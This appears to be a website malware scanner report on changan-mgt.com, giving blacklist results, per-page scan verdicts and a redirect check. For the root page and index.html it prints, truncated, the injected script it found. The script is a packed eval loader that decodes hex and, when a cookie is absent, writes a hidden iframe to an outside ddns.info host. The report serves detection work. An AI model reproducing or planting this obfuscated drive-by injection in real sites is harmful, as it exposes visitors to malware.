Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=changan-mgt.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://changan-mgt.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.changan-mgt.com/ | 200 OK Content-Length: 10945 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i& Decoded script: function hDcd(data){var b16_digits='0123456789abcdef';var b16_map=new Array();for(var i=0;i<256;i++){b16_map[b16_digits.charAt(i>>4)+b16_digits.charAt(i&15)]=String.fromCharCode(i)}if(!data.match(/^[a-f0-9]*$/i))return false;if(data.length%2)data='0'+data;var ll=data.length;var result=new Array();var j=0;for(var i=0;i<ll;i+=2){result[j++]=b16_map[data.substr(i,2)]}return result.join('')}if(document.cookie.indexOf('cookieh=enabled')==-1){document.write(hDcd('3c646976207374796 <div style="position: absolute; left: -1998px; top: -2992px;"><iframe width="30" height="30" src="http://sszbulgj.ddns.info/main.php?page=c69bd02e93e6957c"></iframe></div> Antivirus reports:
| ||
http://www.changan-mgt.com/company.php?l=gb | 200 OK Content-Length: 4988 Content-Type: text/html | clean |
http://www.changan-mgt.com/js/sifr.js | 200 OK Content-Length: 10470 Content-Type: application/javascript | clean |
http://www.changan-mgt.com/js/sifr-addons.js | 200 OK Content-Length: 1893 Content-Type: application/javascript | clean |
http://www.changan-mgt.com/index.html | 200 OK Content-Length: 10945 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i& Decoded script: function hDcd(data){var b16_digits='0123456789abcdef';var b16_map=new Array();for(var i=0;i<256;i++){b16_map[b16_digits.charAt(i>>4)+b16_digits.charAt(i&15)]=String.fromCharCode(i)}if(!data.match(/^[a-f0-9]*$/i))return false;if(data.length%2)data='0'+data;var ll=data.length;var result=new Array();var j=0;for(var i=0;i<ll;i+=2){result[j++]=b16_map[data.substr(i,2)]}return result.join('')}if(document.cookie.indexOf('cookieh=enabled')==-1){document.write(hDcd('3c646976207374796 <div style="position: absolute; left: -1998px; top: -2992px;"><iframe width="30" height="30" src="http://sszbulgj.ddns.info/main.php?page=c69bd02e93e6957c"></iframe></div> Antivirus reports:
| ||
http://www.changan-mgt.com/company.php?l=cn | 200 OK Content-Length: 4692 Content-Type: text/html | clean |
http://www.changan-mgt.com/services.php?l=cn | 200 OK Content-Length: 5189 Content-Type: text/html | clean |
http://www.changan-mgt.com/projects.php?l=cn | 200 OK Content-Length: 4606 Content-Type: text/html | clean |
http://www.changan-mgt.com/photos.php?l=cn | 200 OK Content-Length: 12376 Content-Type: text/html | clean |
http://www.changan-mgt.com/fu-wah-group.php?l=cn | 200 OK Content-Length: 6099 Content-Type: text/html | clean |
http://www.changan-mgt.com/contact.php?l=cn | 200 OK Content-Length: 5567 Content-Type: text/html | clean |
http://www.changan-mgt.com/test404page.js | 404 Not Found Content-Length: 1187 Content-Type: text/html | clean |
http://www.changan-mgt.com/chang-an-club.php?p=1&l=cn | 200 OK Content-Length: 4670 Content-Type: text/html | clean |
http://www.changan-mgt.com/li-shan-project.php?p=2&l=cn | 200 OK Content-Length: 5041 Content-Type: text/html | clean |
http://www.changan-mgt.com/chang-an-country-club.php?p=3&l=cn | 200 OK Content-Length: 4704 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: changan-mgt.com
Result:
GET / HTTP/1.1
Host: changan-mgt.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: changan-mgt.com
Referer: http://www.google.com/search?q=changan-mgt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: changan-mgt.com
Referer: http://www.google.com/search?q=changan-mgt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.